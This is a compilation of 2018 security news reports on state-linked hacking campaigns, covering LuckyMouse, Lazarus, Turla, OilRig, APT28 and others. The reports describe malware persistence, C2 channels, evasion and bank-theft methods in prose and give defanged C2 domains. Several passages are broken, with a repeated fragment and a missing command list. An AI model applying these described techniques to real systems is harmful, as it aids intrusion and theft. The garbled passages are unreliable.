“Since March 2018 we have discovered several infections where a previously unknown Trojan was injected into the lsass.exe system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy.” reads the analysis published by Kaspersky.
“Interestingly, this driver is signed with a digital certificate that belongs to Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.”
The cyberespionage campaign analyzed by Kaspersky targeted Middle Asian government entities immediately prior to the Central Asian high-level meeting. Attackers show a specific interest in the regional political agenda.
The malware is composed of the following three modules:
A custom C++ installer that decrypts and drops the driver file in the corresponding system directory then creates a Windows autorun service to obtain driver persistence and adds the encrypted in-memory Trojan to the system registry.
A network filtering driver (NDISProxy) that decrypts and injects the Trojan into memory and filters port 3389 (Remote Desktop Protocol, RDP) traffic in order to insert the Trojan’s C2 communications into it.
The final payload is written in C++, it is a Trojan acting as HTTPS server that works together with the driver. It waits passively for communications from its C2, with two possible communication channels via ports 3389 and 443.
These modules allow lateral movements of the threat but don’t allow them to communicate with an external Command and Control infrastructure if the new infected host only has a LAN IP. The operators leveraged an Earthworm SOCKS tunneler to connect the LAN of the infected host to the external C2. The modules also used the Scanline network scanner to find file shares (port 135, Server Message Block, SMB) used to spread malware with administrative passwords, compromised with keyloggers.
The malware is distributed through already compromised networks instead of leveraging spear-phishing messages.
The dropper can install both 32-bit and 64-bit drivers, depending on the target, and keeps track of all the installation process.
The network filtering driver NDISProxy inject a RAT that can execute common tasks into the compromised system, including running commands and downloading/uploading files.
The Trojan is used by attackers to harvest data from compromised hosts, to make lateral movements and for establishing the connection to C&C through SOCKS tunnels.
“This campaign appears to demonstrate once again LuckyMouse’s interest in Central Asia and the political agenda surrounding the Shanghai Cooperation Organization.” concludes Kaspersky.
Further details including IoCs are reported in the analysis published by the experts.
Domestic Kitten – An Iranian surveillance operation under the radar since 2016
10.9.2018 securityaffairs APT
CheckPoint uncovered an extensive surveillance operation conducted by Iranian APT actor and tracked as Domestic Kitten aimed at specific groups of individuals.
Researchers at security firm CheckPoint uncovered an extensive surveillance operation conducted by Iranian APT actor and tracked as Domestic Kitten aimed at specific groups of individuals.
Cyber spies used malicious mobile apps that collect sensitive information on the target device and implements specific features to spy on the victims, such as recording the surrounding voices.
The attackers are spying on Iranian individuals that are Kurdish and Turkish natives, and ISIS supporters.
“Through the use of mobile applications, those behind the attack use fake decoy content to entice their victims to download such applications, which are in fact loaded with spyware, to then collect sensitive information about them.” reads the analysis published by CheckPoint.
“Interestingly, these targets include Kurdish and Turkish natives and ISIS supporters. Most interesting of all, though, is that all these targets are actually Iranians citizens.”
The list of information collected from the compromised devices is long and includes:
contact lists
call records
text and multimedia messages
browser history and bookmarks
geographical location
photos
recordings of nearby conversations
list of installed apps
clipboard content
data on external storage
The threat actor uses decoy applications which are believed to be of interest to the targets. The researchers discovered ISIS branded wallpaper changer, “updates” from the ANF Kurdistan news agency and a fake version of the Vidogram messaging app.
All the applications used in the campaign have the same certificate that was issued in 2016, the researchers confirmed that the extensive and targeted attacks are going on since 2016 and, until now, have remained under the radar due to the artful deception of the attackers towards their targets
The wallpaper changer aimed at the ISIS supported is designed to lure them by offering ISIS-related pictures to set as the screen background.
Data exfiltrated from the victim’s device are transferred to the C&C server via HTTP POST requests, it is encrypted with the AES algorithm and can be decrypted with a device ID that is unique for each victim.
One of the applications connects firmwaresystemupdate[.]com that is a newly registered website that was seen initially to resolve to an Iranian IP address but that later switched to a Russian address.
CheckPoint published the victim distribution, the cyberspies infected devices of at least 240 users most of them are Iranians (97%), the remaining are from in Afghanistan, Iraq and Great Britain.
“While the number of victims and their characteristics are detailed above, the number of people affected by this operation is actually much higher. This is due to the fact that the full contact list stored in each victim’s mobile device, including full names and at least one of their phone numbers, was also harvested by the attackers.” continues the analysis.“In addition, due to phone calls, SMS details, as well as the actual SMS messages, also recorded by the attackers, the private information of thousands of totally unrelated users has also been compromised.”
This means that the Domestic Kitten surveillance operation had collateral victims whose details were leaked from contact lists or conversations with the targets.
The researchers attributed the surveillance activity to the Iranian regime based on the political conditions in the region and the nature of the targets that pose a threat to the stability of the Government.
“Indeed, these surveillance programs are used against individuals and groups that could pose a threat to the stability of the Iranian regime. These could include internal dissidents and opposition forces, as well as ISIS advocates and the Kurdish minority settled mainly in Western Iran,” CheckPoint concludes.
CrowdStrike uncovered a new campaign of GOBLIN PANDA APT aimed at Vietnam
6.9.2018 securityaffairs APT
Researchers from security firm CrowdStrike have observed a new campaign associated with the GOBLIN PANDA APT group.
Experts from security firm CrowdStrike have uncovered a new campaign associated with the GOBLIN PANDA APT group.
The group also knows as Cycldek was first spotted in September 2013, it was mainly targeting entities in Southeast Asia using different malware variants mainly PlugX and HttpTunnel.
In 2014, experts noticed an intensification in the activity of the group that appeared interested in the dispute over the South China Sea.
GOBLIN PANDA was focused on Vietnam, most of the targets were in the defense, energy, and government sectors.
The group is back and is targeting once again Vietnam running a spear phishing campaign that uses weaponized documents featuring Vietnamese-language lures and themes
“Last month, CrowdStrike Intelligence observed renewed activity from GOBLIN PANDA targeting Vietnam. As part of this campaign, new exploit documents were identified with Vietnamese-language lures and themes, as well as Vietnam-themed, adversary-controlled infrastructure.” reads the analysis published by CrowdStrike.
“Two exploit documents with Vietnamese-language file names were observed with file metadata unique to the GOBLIN PANDA adversary.”
The researchers analyzed two weaponized documents written in Vietnamese-language and attributed them to GOBLIN PANDA based their metadata.
The decoy documents have training-related themes and trigger the Office vulnerability CVE-2012-0158 flaw to deliver a malware implant tracked as QCRat by CrowdStrike Falcon Intelligence.
The document did not specifically reference projects related to the Vietnamese government or departments, however, they could be used to trick Government of Vietnam personnel to open them.
According to CrowdStrike, the decoy documents use a previously identified legitimate executable, a side-loading implant Dynamic Link Library (DLL), and new implant configuration files stored as a .tlb file.
The analysis of command and control servers suggests that GOBLIN PANDA hackers are also targeting entities in Laos.
“Analysis of command and control infrastructure suggests that GOBLIN PANDA is targeting entities in Laos, as well. CrowdStrike Intelligence has not directly observed Laotian targeting, and cannot confirm targets in Laos for this campaign, however, previous activity linked to GOBLIN PANDA has targeted this country.” concludes the report.
“Given major economic initiatives by China, such as the Belt and Road Initiative and continued dispute over the Paracel Islands, it is unlikely that GOBLIN PANDA will abandon efforts to collect intelligence from South East Asian neighbors and businesses operating in that region,”
Group-IB UncoversAPT- attacks on Banks: The Sound of Silence
6.9.2018 securityaffairs APT
Researchers at security firm Group-IB have exposed the attacks carried out by the Silence cybercriminal group, providing details on its tactics and tools.
Experts at security firm Group-IB have exposed the attacks committed by Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts also have discovered evidence of the group’s activity in more than 25 countries worldwide.
Group-IB has published its first detailed report “Silence: Moving into the darkside” on tactics and tools employed by the cybercriminals. Group-IB security analysts’ hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD.
After the activity of Cobalt group has declined, Silence became one of the major threats to Russian and international banks. Once only known to cybersecurity specialists, Silence is an example of a mobile, small, and young group that has been progressing rapidly. Confirmed thefts by Silence increased more than fivefold from just 100 000 USD in 2017 to 550 000 USD in less than a year. The current confirmed total thefts form Silence attacks stands at 800 000 USD.
For more than two years, there was not a single sign of Silence that would enable to identify them as an independent cybercrime group. The timeline and nature of the attacks identified by Group-IB forensic specialists suggested strongly that the first attacks were very amateur in nature and the criminals were learning as they went along. Since autumn 2017, the group has become more active. Based on analysis and comparison with other incidents and financial APT timelines, it is clear that Silence analyses methods of other criminal groups and applies new tactics and tools on various banking systems – AWS CBR (Automated Work Station Client of the Russian Central Bank), ATMs, and card processing.
Group-IB incident response and intelligence teams detected Silence’s activity in 2016 for the very first time. Silence members attempted to withdraw money via AWS CBR; however, due to some errors in payment orders, the theft was successfully prevented. In 2017, Silence began to conduct attacks on ATMs. The first incident confirmed by Group-IB revealed that gang members stole 100 000 USD from ATMs in just one night. In 2018, they targeted card processing using supply-chain attack, picking up 550 000 USD via ATMs of the bank’s counterpart over one weekend. In April 2018, two months after they successfully targeted card processing, the group decided to leverage its previous scheme and stole roughly 150 000 USD through ATMs. At this point, the attacks described above can be unequivocally attributed to Silence, but Group-IB security experts believe that there have been other successful attacks on banks. 
Who are Silence?
Group-IB experts concluded that Silence is a group of Russian-speaking hackers, based on their commands language, the location of infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan). Although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia). Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.
There appear to be just two members in Silence—a developer and an operator. This explains why they are so selective in their attack targets, and why it takes them so long (up to 3 months, which is at least three times longer than Anunak, Buhtrap, MoneyTaker and Cobalt) to commit a theft. One gang member – a developer – has skills of a highly experienced reverse engineer. He develops tools to conduct attacks and modifies complex exploits and software. However, in development he makes a number of errors, that are quite common for virus analysts or reverse engineers; he knows exactly how to develop software, but he does not know how to program properly. The second member of the team is an operator. He has experience in penetration testing, which means he can easily find his way around banking infrastructure. He is the one who uses the developed tools to access banking systems and initiates the theft process.
Silence’s tools and methods
Like most cybercrime groups, Silence uses phishing emails. Initially, the group used hacked servers and compromised accounts for its campaigns. Later on, the criminals began to register phishing domains, for which they created self-signed certificates. Silence designs very well-crafted phishing emails usually purporting to be from bank employees. To conduct their phishing campaigns, the hackers rent servers in Russia and the Netherlands. Silence also uses Ukraine-based hosting services to rent servers to use as C&C servers. A number of servers were rented at MaxiDed, whose infrastructure was blocked by Europol in May 2018.
In their first operations, Silence used a borrowed backdoor – Kikothac, which makes it clear that the group began its activity without any preparation—these were attempts to test the waters. Later, the group’s developer created a unique set of tools for attacks on card processing and ATMs including Silence— a framework for infrastructure attacks , Atmosphere—a set of software tools for attacks on ATMs, Farse—a tool to obtain passwords from a compromised computer, and Cleaner—a tool for logs removal.
“Silence, in many ways, is changing the perception of cybercrime in terms of the nature of the attacks, the tools, tactics, and even the members of the group. It is obvious that the criminals responsible for these crimes were at some point active in the security community. Either as penetration testers or reverse engineers,” says Dmitry Volkov, Chief Technology Officer and Head of Threat Intelligence at Group-IB.
“They carefully study the attacks conducted by other cybercriminal groups, and analyse antivirus and Threat Intelligence reports. However, it does not save them from making mistakes; they learn as they go. Many of Silence’s tools are legitimate, others they developed themselves and learn from other gangs. After having studied Silence’s attacks, we concluded that they are most likely white hats evolving into black hats. The Internet, particularly the underground web, favours this kind of transformation; it is far easier now to become a cybercriminal than 5–7 years ago—you can rent servers, modify existing exploits, and use legal tools. It makes things more complicated for blue teams and much easier for hackers”.
New OilRig APT campaign leverages a new variant of the OopsIE Trojan
6.9.2018 securityaffairs APT
The Iran-linked APT group OilRig was recently observed using a new variant of the OopsIE Trojan that implements news evasion capabilities.
Experts at Palo Alto observed a new campaign carried out by the Iran-linked APT group OilRig that was leveraging on a new variant of the OopsIE Trojan.
The OilRig hacker group is an Iran-linked APT that has been around since at least 2015, since then it targeted mainly organizations in the financial and government sectors, in the United States and Middle Eastern countries.
The OopsIE Trojan is one of the malware in the APT’s arsenal that was detected for the first time in February 2018.
In July the hackers leveraged a new variant of the Trojan that implements new anti-analysis and evasion detection capabilities.
The OopsIE variant used in the last campaign begins its execution by performing a series of anti-analysis checks.
It would check CPU fan information (it is the first time a malware checks CPU fan info), temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.
The campaign was also delivering the QUADAGENT backdoor, anyway, experts noticed the group using a different malware for each targeted organization.
“In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT.” reads the analysis published by Paolo Alto Network
“The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT.”
The hackers launched spear phishing attacks against a government agency using compromised email accounts at a government organization in the same country in the Middle East.
The OilRig hackers sent the phishing messages to the email address of a user group that had published documents regarding business continuity management, the subject of the messages was in Arabic, which translated to “Business continuity management training”.
The new OopsIE variant would check the TimeZone.CurrentTimeZone.DaylightName property, it runs only in presence of strings for Iran, Arab, Arabia, and Middle East.
The attack is highly targeted because the previous check allows hitting only five time zones that encompass 10 countries.
The new variant connects the www.windowspatch[.]com domain as domain and also sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task to run a VBScript to gain persistence every three minutes.
The malware supports various commands, it can write the output to a file and send it to the server, download a file to the system, read a specified file and upload its contents, and uninstall itself.
“The OilRig group remains a persistent adversary in the Middle East region. They continue to iterate and add capabilities to their tools while still functionally using the same tactics over and over again.” concludes the report.
“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.
Researchers Draw Connections Between APTs
31.8.2018 securityweek APT
A newly discovered threat group shares similarities with three advanced persistent threats (APTs), Trend Micro security researchers have discovered.
Referred to as Urpage, the actor is connected to the hacking groups known as Bahamut, Confucius, and Patchwork. Trend Micro found a connection between Confucius and Patchwork in early 2018, but continued the investigation and discovered further evidence of similarities between the groups.
Also known as Dropping Elephant and Chinastrats, Patchwork is a cyberespionage group that associated with various attacks last year. Operating out of the Indian subcontinent, it targets various entities, including United States-based think tanks.
Urpage, which targets InPage (a word processor for Urdu and Arabic languages under Windows and Mac and a de facto standard Urdu publishing tool), is using a Delphi backdoor component that links it to Confucius and Patchwork, as well as Bahamut-like malware, Trend Micro reveals.
Specifically, the actor is using Android malware that matches Bahamut’s code, but which connects to its own command and control (C&C) infrastructure. Also acting as phishing sites, some of these C&C’s attempt to lure users into downloading malicious applications via links to Google Play (the programs are no longer available in the portal).
However, not all C&C websites advertise malicious applications, the security researchers warn. Some of them only contain a random template with empty categories.
Urpage’s malicious programs are designed to steal information from the compromised machines, the same as Bahamut applications to. They can retrieve network information and the MAC address, steal SMS messages and contacts, record audio, retrieve GPS location, and steal files with specific extensions.
One of the applications works on top of a modified version of the legitimate Threema end-to-end encrypted messaging software to steal screenshots of messages. While the modified app works normally, the malicious code, which is hidden from the user, takes screenshots every 10 seconds.
The attacker-linked websites also host malicious documents that link Urpage to other threat actors. These include a RTF file that exploits the CVE-2017-8750 and an InPage file that exploits CVE-2017-12824, both of which are dropping VB backdoors.
Trend Micro discovered that Urpage uses the same Delphi file stealer as the threat actor Confucius, and also that the two are linked via a couple of malicious RTF files that download a similar script.
With the Patchwork group also using the Delphi file stealer, the three groups appear related in some form. The link with Patchwork is further strengthened by an Android application that features code similar to that of Bahamut and a C&C that uses the registration pattern of Patchwork’s group, along with infrastructure close to an old Patchwork domain.
“The many similarities and connections show that threat actors do not work in isolation, and that attacks do not necessarily appear from out of nowhere. This may even suggest that a single development team may be behind this attack — maybe a single paid group that has sold its tools and services to other groups with different goals and targets,” Trend Micro concludes.
Iran-linked COBALT DICKENS group targets universities in new phishing campaign
29.8.2018 securityaffairs APT
Experts from SecureWorks discovered a large phishing campaign targeting universities carried out by an Iran-linked threat actor COBALT DICKENS.
Security firm SecureWorks has uncovered a new phishing campaign carried out by COBALT DICKENS APT targeting universities worldwide, it involved sixteen domains hosting more than 300 spoofed websites for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.
“SecureWorks Counter Threat Unit™ (CTU) researchers discovered a URL spoofing a login page for a university. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials.” reads the report published by SecureWorks.
“Sixteen domains contained over 300 spoofed websites and login pages for 76 universities located in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States”
Universities are a privileged target for nation-state actors aimed at stealing intellectual property and cutting-edge projects.
Most of the websites spoofed universities’ online library systems, the attackers were interested in accessing those resources and gather intelligence.
The visitors were displayed login pages, once they have entered their credentials they were redirected to the legitimate websites where they were automatically logged into a valid session or were asked to enter their credentials again.
Many of the domains used by COBALT DICKENS were registered between May and August 2018, most of them resolved to the same IP address and DNS name server.
The attackers shared the same infrastructure used by the COBALT DICKENS group in a previous campaign.
Iranian hacking activity is intensifying in the last years, security firms uncovered the activities of many Iran-linked APT groups.
The US Department of Justice and Department of the Treasury in March announced charges against nine Iranians for alleged involvement in a massive state-sponsored hacking scheme, the hackers hit more than 300 universities and tens of companies in the US and abroad and stole “valuable intellectual property and data.”
According to the Treasury Department, since 2013, the Mabna Institute hit 144 US universities and 176 universities in 21 foreign countries.
Geoffrey Berman, US Attorney for the Southern District of New York revealed that the spear phishing campaign targeted more than 100,000 university professors worldwide and about 8,000 accounts were compromised.
The Iranian hackers exfiltrated 31 terabytes, roughly 15 billion pages of academic projects were stolen.
The hackers also targeted the US Department of Labor, the US Federal Energy Regulatory Commission, and many private and non-governmental organizations.
The sanctions also hit the Mabna Institute, an Iran-based company, that had a critical role in coordinating the attacks on behalf of Iran’s Revolutionary Guards.
“In March 2018, the U.S. Department of Justice indicted the Mabna Institute and nine Iranian nationals in connection with COBALT DICKENS activity occurring between 2013 and 2017.” concludes the report.
“Many threat groups do not change their tactics despite public disclosures, and CTU analysis suggests that COBALT DICKENS may be responsible for the university targeting despite the indictments of some members.”
North Korea-linked Hackers Stole $13.5 Million From Cosmos Bank: Report
28.8.2018 securityweek APT BigBrothers
The North Korea-linked hacking group Lazarus is said to have stolen $13.5 million in a recent cyber-attack targeting SWIFT/ATM infrastructure of Cosmos Bank.
The attackers likely gained access to the bank’s systems via spear phishing and/or remote administration/third-party interface and used multiple attack techniques to steal funds. The theft took place between August 10 and 13, 2018, according to researchers from Securonix.
Believed to be backed by the North Korean government, the Lazarus group was said last year to be the most serious threat to banks. This year, the hackers also focused heavily on crypto-currency exchanges and have been involved in numerous attacks against such organizations.
A recent report also revealed that most malware families originating from North Korea can be linked to Lazarus via code reuse.
Now, Securonix security researchers reveal that Lazarus was behind a high-profile ATM/SWIFT banking attack involving the Cosmos Bank, a 112-year old cooperative bank in India and the second largest in the country.
As part of the incident, the hackers are believed to have leveraged a previously established foothold before compromising the bank’s internal and ATM infrastructure on August 10-11.
Likely abusing vendor ATM test software or modifying the currently deployed ATM payment switch software, they set up a malicious ATM/POS switch and hijacked the connection between the central switch and the backend/Core Banking System (CBS).
Next, they made adjustments to the target account balances to enable withdrawals and leveraged the malicious switch to authorize ATM withdrawals for over $11.5 million in tens of thousands of domestic and international transactions, using 450 cloned (non-EMV) debit cards in 28 countries.
The malicious switch was used to send fake messages to authorize the transactions and also to prevent details sent from payment switch to reach the CBS (thus, checks on card number, card status PIN, and more were never performed).
On August 13, 2018, likely following lateral movement, the threat actor abused the Cosmos Bank’s SWIFT SAA environment LSO/RSO compromise/authentication to send three international wire transfer requests to ALM Trading Limited at Hang Seng Bank in Hong Kong, amounting to around $2 million.
“The ATM/POS banking switch that was compromised in the Cosmos Bank attack is a component that typically provides hosted ATM/POS terminal support, an interface to core banking solution (CBS) or another core financial system, and connectivity to regional, national or international networks. The primary purpose of the system is to perform transaction processing and routing decisions,” Securonix explains.
By focusing on the bank’s infrastructure instead of basic card-not-present (CNP), jackpotting or blackboxing fraud, the well-planned, highly coordinated attack was able to effectively bypass bank’s layers of defense against ATM attacks.
The security firm attributes the attack to Lazarus, a group known for the use of Windows Admin Shares for Lateral Movement, the use of custom command and control (C&C) servers that mimic TLS, the use of Windows services for persistence, timestomping, and reflective DLL injection, along with other attack techniques.
Turla Backdoor Controlled via Email Attachments
24.8.2018 securityweek APT
ESET security researchers have analyzed a new backdoor used by the Russian-speaking advanced persistent threat (APT) group known as Turla.
Also known as Snake, or Uroburos, Turla has been active since at least 2007, targeting governments, state officials, diplomats, and military authorities, including Swiss defense firm RUAG and the U.S. Central Command, among others.
Last year, security researchers discovered a link between the group and one of the earliest known state-sponsored cyberespionage operations carried out in the ‘90s.
In 2017, Turla targeted Germany’s Federal Foreign Office to implant a backdoor on several computers and steal data almost the entire 2017. The hackers first compromised the network of the country’s Federal College of Public Administration and leveraged it to breach the network of the Foreign Office in March 2017.
Now, ESET reveals that the backdoor used in this attack was also used to “open a covert access channel to the foreign offices of another two European countries, as well as to the network of a major defense contractor.”
The backdoor was supposedly created as far back as 2009 and has received numerous updates over time, getting new functionality, including stealth and resilience. A version discovered in April 2018 can execute malicious PowerShell scripts directly in memory, a tactic many actors have been adopting over the past few years.
The malware now targets Microsoft Outlook, subverting the application’s legitimate Messaging Application Programming Interface (MAPI) to access the targets’ mailboxes. Previously, it was observed targeting The Bat! email client, ESET notes.
The backdoor doesn’t use a conventional command-and-control (C&C) infrastructure, being operated via specially crafted PDF files in email attachments instead. The malware is delivered in the form of a Dynamic Link Library (DLL) module and is installed using a legitimate Windows utility (RegSvr32.exe).
For persistence, the threat modifies Windows registry entries. Specifically, it leverages the “COM object hijacking” technique, which ensures that the backdoor is activated each time Microsoft Outlook is launched.
The backdoor generates logs on every sent or received email message (with information on sender, recipient, subject, and attachment name), and regularly bundles the logs together with other data and sends them to Turla’s operators via a PDF attached to an email message.
For each incoming email, the malware checks for the presence of a PDF that may contain commands and accepts commands from anyone able to encode them into a PDF document. This means that Turla’s operators can regain control of an infected machine by sending commands from any email address.
“The backdoor’s level of resilience to takedowns is almost on a par with that of a rootkit that, in inspecting inbound network traffic, listens for commands from its operators,” ESET notes.
On compromised machines, the malware goes to lengths to stay undetected and no email received by the attacker ever appears in the mailbox. Moreover, the backdoor also blocks all of the notifications of incoming email messages that have been sent by its operators.
The malware includes support for a broad range of commands, including file manipulation, shell command execution, process creation, directory manipulation, and more, ESET reveals in a technical analysis (PDF). The main purpose of the malware is data exfiltration and the download and execution of additional programs or commands.
“The Turla backdoor is a fully-fledged backdoor that uses customized and proprietary techniques, can work independently of any other Turla component, and is fully controlled by email. In fact, ESET researchers are not aware of any other espionage group currently utilizing a backdoor that is entirely controlled by emails, and specifically through PDF attachments,” ESET concludes.
North Korea-linked Lazarus APT uses first Mac malware in cryptocurrency exchange attack
24.8.2018 securityaffairs APT
North Korea-linked Lazarus APT group leveraged for the first time on a MacOS variant of the Fallchill malware in a cryptocurrency exchange attack.
According to Kaspersky, the North Korea-linked Lazarus group used a macOS malware to target a cryptocurrency exchange in a recent attack.
The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.
This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.
According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.
Recently the APT targeted cryptocurrency exchanges and cryptocurrency companies, experts from Kaspersky Lab tracked a new campaign dubbed Operation AppleJeus aimed at spreading a tainted cryptocurrency trading application.
“While investigating a cryptocurrency exchange attacked by Lazarus, we made an unexpected discovery. The victim had been infected with the help of a trojanized cryptocurrency trading application, which had been recommended to the company over email.” states the report published by Kaspersky.
“It turned out that an unsuspecting employee of the company had willingly downloaded a third-party application from a legitimate looking website and their computer had been infected with malware known as Fallchill, an old tool that Lazarus has recently switched back to.”
The novelty of this attack is that the attacker for the first time used a version of the Fallchill malware specifically developed to target macOS systems, in addition to Windows.
The new development is very important for the strategy of the group that is expanding the list of potential targets.
“The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms,” continues Kaspersky.
The malware was inserted into the installation package, instead, it was delivered to the target machine in the form of an update.
The experts discovered that the APT used the legitimate-looking application called Celas Trade Pro and comes from Celas Limited.
At the end of the installation process, the software runs the Updater.exe module that gathers system information and sends it back to the server in the form of a GIF image.
The malware continuously connects the command and control (C&C) server to fetch and execute an additional executable file.
Based on the server’s response (response HTTP code 200), the updater could extract a malicious code encoded with base64 and decrypts it using RC4 with another hardcoded key to retrieve an executable file.
For macOS users, Celas LLC also provided a native version of its trading app, experts noticed that a hidden ‘autoupdater’ module is installed in the background to start immediately after installation and also after every system reboot.
At the time of the report, it was not clear whether Lazarus compromised Celas server in a classic supply chain attack or managed to create “a legitimate looking business and inject a malicious payload into a ‘legitimate looking’ software update mechanism.”
Once the Cellas Trade Pro app is installed on macOS, it launches the Updater application on the system load via a file named “.com.celastradepro.plist.”
The fact that it starts with a dot symbol makes the Updates unlisted in the Finder app or default Terminal directory listing.
The “Updater” file is passed the “CheckUpdate” parameter on start, it quits if no argument is passed.
The updater is implemented using the cross-platform Qt framework, once executed it creates a unique identifier for the infected host, collects system information, and send them to the attacker’s server in encrypted format.
“First of all, Lazarus group has entered a new platform: macOS. There is steadily growing interest in macOS from ordinary users, especially in IT companies. Many developers and engineers are switching to using macOS. Apparently, in the chase after advanced users, software developers from supply chains and some high profile targets, threat actors are forced to have macOS malware tools.” concludes Kaspersky.
“We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once.”
Latest Turla backdoor leverages email PDF attachments as C&C mechanism
24.8.2018 securityaffairs APT
Malware researchers from ESET have published a detailed report on the latest variant of the Turla backdoor that leverages email PDF attachments as C&C.
Malware researchers from ESET have conducted a new analysis of a backdoor used by the Russia-linked APT Turla in targeted espionage operations.
The new analysis revealed a list of high-profile victims that was previously unknown.
Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.
The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.
The Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla.
The new analysis conducted by ESET revealed that hackers breached Germany’s Federal Foreign Office, Turla infected several computers and used the backdoor to syphon data for almost the whole of 2017.
The cyberspies first compromised the network of the country’s Federal College of Public Administration, then breached into the network of the Foreign Office in March 2017, the hack was discovered by German authorities at the end of the year and publicly disclosed in March 2018. ESET explained that the most important aspect of the new analysis is the discovery of a covert access channel used by Turla to hit foreign offices of another two European countries.
“Importantly, our own investigation has determined that, beyond this much-publicized security breach, the group has leveraged the same backdoor to open a covert access channel to the foreign offices of another two European countries, as well as to the network of a major defense contractor.” reads the analysis published by ESET.
“These organizations are the latest known additions to the list of victims of this APT group that has been targeting governments, state officials, diplomats, and military authorities since at least 2008.”
The Turla backdoor has been used since at least 2009 and was continuously improved across the years. The most recent samples appear very sophisticated and implement a rare degree of stealth and resilience. The last analyzed variant is dated back April 2018 and implements the ability to execute malicious PowerShell scripts directly in computer memory.
The malware analyzed by ESET does not use a classic command and control server, instead, it receives updates and instructions via PDF files delivered via email.
“Rather than using a conventional command-and-control (C&C) infrastructure, such as one based on HTTP(S), the backdoor is operated via email messages; more specifically, through specially crafted PDF files in email attachments.” continues the analysis.
“The compromised machine can be instructed to carry out a range of commands. Most importantly, these include data exfiltration, as well as the downloading of additional files and the execution of additional programs and commands. Data exfiltration itself also takes place via PDF files.”
Information is exfiltrated by generating a PDF with the siphoned data and sent out via emails and message metadata.
“From the PDF documents, the backdoor is able to recover what attackers call a container in the logs. This is a binary blob with a special format that contains encrypted commands for the backdoor,” reads the report released by ESET.
“Technically, the attachment does not have to be a valid PDF document. The only requirement is that it includes a container in the right format.”
The Turla backdoor deletes the messages sent to or received from the attacker to remain stealth.
The backdoor is a standalone DLL (dynamic link library) that interacts with Outlook and The Bat! email clients, it gains persistence by using COM object hijacking. With this trick, the malicious DLL could be loaded each time Outlook loads the COM object.
Differently from other backdoors, the Turla sample subverts Microsoft Outlook’s legitimate Messaging Application Programming Interface (MAPI) to access the targets’ mailboxes and avoid being detected.
The backdoor implements several commands, below the full list:
ESET experts did not detect any PDF sample including the commands for the backdoor, but they were able to create such a document.
The full list of Indicators Of Compromise (IoCs) and samples can be found on GitHub.
Microsoft says Russian hackers continue targeting 2018 midterm elections
21.8.2018 securityaffairs BigBrothers APT
Microsoft has spotted a new hacking campaign targeting 2018 midterm elections, the experts attributed the attacks to Russia-linked APT28 group.
Microsoft has spotted a new hacking campaign targeting 2018 midterm elections.
The tech giant attributed to Russia-linked APT28 a series of cyber attacks aimed at Members of United States’ Senate, conservative organizations and think tanks.
The Russian APT group tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007 and operates under the Russian military agency GRU and continues to target US politicians.
According to Microsoft, the Russian cyberspies created at least six fake websites related to US Senate and conservative organizations to infect the visitors’ systems.
Three bogus domains were created to appear as legitimate sites belonging to U.S. Senate, a fourth non-political website spoofed Microsoft’s online products.
The remaining websites were designed to mimic two U.S. conservative think tanks:
The Hudson Institute — a conservative Washington think tank.
The International Republican Institute (IRI) — a nonprofit group that promotes democracy worldwide and whose board includes prominent Republican figures like Sen. John McCain.
The fake sites were created over the past several months, hackers registered them with major web-hosting companies.
Microsoft did not provide further details on the attacks.
“One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices.” reads the post published by Microsoft.
“To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.”
Microsoft’s Digital Crimes Unit shut down the fake websites with a court approval received last year and notified targeted organizations.
